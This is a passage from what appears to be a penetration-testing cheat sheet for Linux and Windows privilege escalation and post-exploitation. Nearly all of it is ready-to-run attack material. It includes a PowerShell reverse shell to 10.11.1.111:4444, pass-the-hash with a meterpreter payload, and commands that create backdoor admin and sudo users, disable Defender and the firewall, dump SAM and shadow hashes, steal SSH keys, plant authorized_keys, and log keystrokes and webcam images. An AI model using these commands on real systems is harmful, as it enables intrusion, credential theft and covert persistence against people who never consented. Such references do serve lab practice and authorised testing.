cmd /c nc.exe -l -v -p 1234 > PsExec.exe

```

## Linux

* Useful commands

```bash

# Spawning shell

python -c 'import pty; pty.spawn("/bin/bash")'

python -c 'import pty; pty.spawn("/bin/sh")'

V

Ctrl+Z

stty raw -echo

fg

reset

Ctrl+Z

stty size

stty -rows 48 -columns 120

fg

echo os.system('/bin/bash')

/bin/sh -i

perl -e 'exec "/bin/sh";'

perl: exec "/bin/sh";

ruby: exec "/bin/sh"

lua: os.execute('/bin/sh')

(From within vi)

:!bash

:set shell=/bin/bash:shell

(From within nmap)

!sh

# Access to more binaries

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# Set up webserver

cd /opt/privesc-scripts; python -m SimpleHTTPServer 80

# Download all files

wget http://$IP:8080/ -r; mv $IP exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linprivchecker.py unix-privesc-check

./LinEnum.sh -t -k password -r LinEnum.txt

python linprivchecker.py extended

./unix-privesc-check standard

# Writable directories

/tmp

/var/tmp

# Add user to sudoers

useradd hacker

passwd hacker

echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers

```

### Basic info

```bash

uname -a

env

id

cat /proc/version

cat /etc/issue

cat /etc/passwd

cat /etc/group

cat /etc/shadow

cat /etc/hosts

# Users with login

grep -vE "nologin" /etc/passwd

# Priv Enumeration Scripts

upload /unix-privesc-check

upload linuxprivchecker.py

upload LinEnum.sh

python linprivchecker.py extended

./LinEnum.sh -t -k password

unix-privesc-check

```

### Kernel exploits

```bash

site:exploit-db.com kernel version

perl /opt/Linux_Exploit_Suggester/Linux_Exploit_Suggester.pl -k 2.6

python linprivchecker.py extended

```

### Programs running as root

```bash

ps aux

```

### Installed software

```bash

/usr/local/

/usr/local/src

/usr/local/bin

/opt/

/home

/var/

/usr/src/

# Debian

dpkg -l

# CentOS, OpenSuse, Fedora, RHEL

rpm -qa (CentOS / openSUSE )

# OpenBSD, FreeBSD

pkg_info

```

### Weak/reused/plaintext passwords

* Check database config-file

* Check databases

* Check weak passwords

```bash

username:username

username:username1

username:root

username:admin

username:qwerty

username:password

```

```bash

./LinEnum.sh -t -k password

```

### Inside service

```bash

netstat -anlp

netstat -ano

```

### Suid misconfiguration

 - Binary with suid permission can be run by anyone, but when they are run they are run as root!

```bash

nmap

vim

nano

curl

...

```

```bash

# SUID

find / -perm -4000 -type f 2>/dev/null

# ALL PERMS

find / -perm -777 -type f 2>/dev/null

# SUID for current user

find / perm /u=s -user `whoami` 2>/dev/null

find / -user root -perm -4000 -print 2>/dev/null

# Writables for current user/group

find / perm /u=w -user `whoami` 2>/dev/null

find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null

find / -perm /u+w -user `whoami` 2>/dev/nul

# Dirs with +w perms for current u/g

find / perm /u=w -type -d -user `whoami` 2>/dev/null

find / -perm /u+w,g+w -d -user `whoami` 2>/dev/null

```

### Unmounted filesystems

```bash

mount -l

```

### Cronjob

```bash

crontab -l

ls -alh /var/spool/cron

ls -al /etc/ | grep cron

ls -al /etc/cron*

cat /etc/cron*

cat /etc/at.allow

cat /etc/at.deny

cat /etc/cron.allow

cat /etc/cron.deny

cat /etc/crontab

cat /etc/anacrontab

cat /var/spool/cron/crontabs/root

```

### SSH Keys

 * Chek all home dirs

```bash

cat ~/.ssh/authorized_keys

cat ~/.ssh/identity.pub

cat ~/.ssh/identity

cat ~/.ssh/id_rsa.pub

cat ~/.ssh/id_rsa

cat ~/.ssh/id_dsa.pub

cat ~/.ssh/id_dsa

cat /etc/ssh/ssh_config

cat /etc/ssh/sshd_config

cat /etc/ssh/ssh_host_dsa_key.pub

cat /etc/ssh/ssh_host_dsa_key

cat /etc/ssh/ssh_host_rsa_key.pub

cat /etc/ssh/ssh_host_rsa_key

cat /etc/ssh/ssh_host_key.pub

cat /etc/ssh/ssh_host_key

```

### Bad path configuration

```bash

# Require user interaction

export PATH=/tmp' or your path file':$PATH

```

### Find plain passwords

```bash

grep -rnw '/' -ie 'pass' --color=always

grep -rnw '/' -ie 'DB_PASS' --color=always

grep -rnw '/' -ie 'DB_PASSWORD' --color=always

grep -rnw '/' -ie 'DB_USER' --color=always

```

### Scripts

#### SUID

```bash

int main(void){

  setresuid(0, 0, 0);

  system("/bin/bash");

}

# Compile

gcc suid.c -o suid

```

#### PS Monitor for cron

```bash

#!/bin/bash

# Loop by line

IFS=$'\n'

old_process=$(ps -eo command)

while true; do

    new_process=$(ps -eo command)

    diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>]

    sleep 1

    old_process=$new_process

done

```

#### Linux Privesc Tools

- [GTFOBins](https://gtfobins.github.io/)

- [LinEnum](https://github.com/rebootuser/LinEnum)

- [LinuxExploitSuggester](https://github.com/mzet-/linux-exploit-suggester)

### Linux Precompiled Exploits

[linuxprivchecker](https://github.com/sleventyeleven/linuxprivchecker)

## Windows

* Now we start the whole enumeration-process over gain. This is a checklist. You need to check of every single one, in this order.

1 ) Kernel exploits

2 ) Cleartext password

3 ) Reconfigure service parameters

4 ) Inside service

5 ) Program running as root

6 ) Installed software

7 ) Scheduled tasks

8 ) Weak passwords

### Basic info

```cmd

systeminfo

set

hostname

net users

net user user1

net localgroups

accesschk.exe -uwcqv "Authenticated Users" *

netsh firewall show state

netsh firewall show config

# Set path

set PATH=%PATH%;C:\xampp\php

whoami /priv

dir/a -> Show hidden & unhidden files

dir /Q -> Show permissions

```

### Kernel exploits

```cmd

# Look for hotfixes

systeminfo

wmic qfe get Caption,Description,HotFixID,InstalledOn

# Search for exploits

site:exploit-db.com windows XX XX

```

### Cleartext passwords

```cmd

# Windows autologin

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# VNC

reg query "HKCU\Software\ORL\WinVNC3\Password"

# SNMP Parameters

reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

```

### Reconfigure service parameters

*  Unquoted service paths

* Weak service permissions

https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

### Dump process for passwords

```bash

# Looking for Firefox

Get-Process

./procdump64.exe -ma $PID-FF

Select-String -Path .\*.dmp -Pattern 'password' > 1.txt

type 1.txt | findstr /s /i "admin"

```

### Inside service

```cmd

netstat /a

netstat -ano

```

### Programs running as root/system

### Installed software

```cmd

tasklist /SVC

net start

reg query HKEY_LOCAL_MACHINE\SOFTWARE

DRIVERQUERY

Look in:

C:\Program files

C:\Program files (x86)

Home directory of the user

```

### Scheduled tasks

```cmd

schtasks /query /fo LIST /v

Check this file:

c:\WINDOWS\SchedLgU.Txt

```

### Weak passwords

```cmd

ncrack -vv --user george -P /usr/.../passwords.txt rdp://$IP

```

### Add user and enable RDP

```cmd

# Add new user

net user haxxor Haxxor123 /add

net localgroup Administrators haxxor /add

net localgroup "Remote Desktop Users" haxxor /ADD

# Turn firewall off and enable RDP

sc stop WinDefend

netsh advfirewall show allprofiles

netsh advfirewall set allprofiles state off

netsh firewall set opmode disable

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

```

### Powershell sudo for Windows

```bash

$pw= convertto-securestring "EnterPasswordHere" -asplaintext -force

$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw

$script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"

Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}'

powershell -ExecutionPolicy Bypass -File xyz.ps1

```

### Windows download with bitsadmin

```bash

bitsadmin /transfer mydownloadjob /download /priority normal http:///nc.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\nc.exe

```

### Windows download with certutil.exe

```bash

certutil.exe -urlcache -split -f "http:///Powerless.bat" Powerless.bat

```

### Creating a wget VB Script on Windows

[*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*](https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt)

### Windows download with powershell

```bash

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.1.111/file.exe','C:\Users\user\Desktop\file.exe')"

(New-Object System.Net.WebClient).DownloadFile("http://10.11.1.111/CLSID.list","C:\Users\Public\CLSID.list")

```

### Windows Download from FTP

```bash

# In reverse shell

echo open $IP > ftp.txt

echo USER anonymous >> ftp.txt

echo ftp >> ftp.txt

echo bin >> ftp.txt

echo GET file >> ftp.txt

echo bye >> ftp.txt

# Execute

ftp -v -n -s:ftp.txt

```

### Windows create SMB Server transfer files

```bash

# Attack machine

python /usr/share/doc/python-impacket/examples/smbserver.py

    # Or SMB service

    # http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html

    vim /etc/samba/smb.conf

        [global]

        workgroup = WORKGROUP

        server string = Samba Server %v

        netbios name = indishell-lab

        security = user

        map to guest = bad user

        name resolve order = bcast host

        dns proxy = no

        bind interfaces only = yes

        [ica]

        path = /var/www/html/pub

        writable = no

        guest ok = yes

        guest only = yes

        read only = yes

        directory mode = 0555

        force user = nobody

    chmod -R 777 smb_path

    chown -R nobody:nobody smb_path

    service smbd restart

# Victim machine with reverse shell

Download: copy \\$IP\Lab\wce.exe .

Upload: copy wtf.jpg \\$IP\Lab

```

### Windows download with VBS

```cmd

# In reverse shell

echo strUrl = WScript.Arguments.Item(0) > wget.vbs

echo StrFile = WScript.Arguments.Item(1) >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs

echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs

echo Err.Clear >> wget.vbs

echo Set http = Nothing >> wget.vbs

echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs

echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs

echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs

echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs

echo http.Open "GET",strURL,False >> wget.vbs

echo http.Send >> wget.vbs

echo varByteArray = http.ResponseBody >> wget.vbs

echo Set http = Nothing >> wget.vbs

echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs

echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs

echo strData = "" >> wget.vbs

echo strBuffer = "" >> wget.vbs

echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs

echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs

echo Next >> wget.vbs

echo ts.Close >> wget.vbs

# Execute

cscript wget.vbs http://10.11.1.111/file.exe file.exe

```

### Pass The Hash

```bash

# Login as user only with hashdump

# From this hashdump

# admin2:1000:aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7:::

msf5 > use exploit/windows/smb/psexec

msf5 exploit(windows/smb/psexec) > options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description

   ----                  ---------------  --------  -----------

   RHOSTS                                 yes       The target address range or CIDR identifier

   RPORT                 445              yes       The SMB service port (TCP)

   SERVICE_DESCR10.11.1.111TION                    no        Service description to to be used on target for pretty listing

   SERVICE_DISPLAY_NAME                   no        The service display name

   SERVICE_NAME                           no        The service name

   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share

   SMBDomain             .                no        The Windows domain to use for authentication

   SMBPass                                no        The password for the specified username

   SMBUser                                no        The username to authenticate as

Exploit target:

   Id  Name

   --  ----

   0   Automatic

msf5 exploit(windows/smb/psexec) > set rhosts 10.10.0.100

rhosts => 10.10.0.100

msf5 exploit(windows/smb/psexec) > set smbuser admin2

smbuser => admin2

msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7

smbpass => aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7

msf5 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

```

### Scripts

#### Useradd

```c

#include  /* system, NULL, EXIT_FAILURE */

int main ()

{

  int i;

  i=system ("net user   /add && net localgroup administrators  /add");

  return 0;

}

# Compile

i686-w64-mingw32-gcc -o useradd.exe useradd.c

```

#### Powershell Run As

```cmd

echo $username = '' > runas.ps1

echo $securePassword = ConvertTo-SecureString "" -AsPlainText -Force >> runas.ps1

echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1

echo Start-Process C:\Users\User\AppData\Local\Temp\backdoor.exe -Credential $credential >> runas.ps1

```

#### Powershell Reverse Shell

```cmd

Set-ExecutionPolicy Bypass

$client = New-Object System.Net.Sockets.TCPClient('10.11.1.111',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

```

### Windows privesc/enum tools

- [windows-exploit-suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py)

- [windows-privesc-check](https://github.com/pentestmonkey/windows-privesc-check)

- [PowerUp](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1)

### Windows precompiled exploits

- [WindowsExploits](https://github.com/abatchy17/WindowsExploits)

### Windows Port Forwarding

```sh

# Listen on local port 8080 and forward incoming traffic to REMOT_HOST:PORT via SSH_SERVER

# Scenario: access a host that's being blocked by a firewall via SSH_SERVER;

ssh -L 127.0.0.1:8080:REMOTE_HOST:PORT user@SSH_SERVER

# Run in victim (5985 WinRM):

plink -l LOCALUSER -pw LOCALPASSWORD LOCALIP -R 5985:127.0.0.1:5985 -P 221

```

# Loot :

## Linux

### Passwords and hashes

```bash

cat /etc/passwd

cat /etc/shadow

unshadow passwd shadow > unshadowed.txt

john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

```

### Dualhomed

```bash

ifconfig

ifconfig -a

arp -a

```

### Tcpdump

```bash

tcpdump -i any -s0 -w capture.pcap

tcpdump -i eth0 -w capture -n -U -s 0 src not $IP and dst not $IP

tcpdump -vv -i eth0 src not $IP and dst not $IP

```

### Interesting files

```bash

#Meterpreter

search -f *.txt

search -f *.zip

search -f *.doc

search -f *.xls

search -f config*

search -f *.rar

search -f *.docx

search -f *.sql

use auxiliary/sniffer/psnuffle

.ssh/

.bash_history

```

### Databases

```

```

### SSH-Keys

```bash

mkdir /root/.ssh 2>/dev/null; echo '' >> /root/.ssh/authorized_keys

```

### Browser

### Mail

```bash

/var/mail

/var/spool/mail

```

### GUI

If there is a gui we want to check out the browser.

```bash

echo $DESKTOP_SESSION

echo $XDG_CURRENT_DESKTOP

echo $GDMSESSION

```

## Windows

### Passwords and hashes

```bash

wce32.exe -w

wce64.exe -w

fgdump.exe

# Loot passwords without tools

reg.exe save hklm\sam c:\sam_backup

reg.exe save hklm\security c:\security_backup

reg.exe save hklm\system c:\system

# Meterpreter

hashdump

load mimikatz

msv

```

### Dualhomed

```bash

ipconfig /all

route print

# What other machines have been connected

arp -a

```

### Tcpdump

```bash

# Meterpreter

run packetrecorder -li

run packetrecorder -i 1

```

### Interesting files

```bash

#Meterpreter

search -f *.txt

search -f *.zip

search -f *.doc

search -f *.xls

search -f config*

search -f *.rar

search -f *.docx

search -f *.sql

hashdump

keysscan_start

keyscan_dump

keyscan_stop

webcam_snap

# How to cat files in meterpreter

cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt

# Recursive search

dir /s

```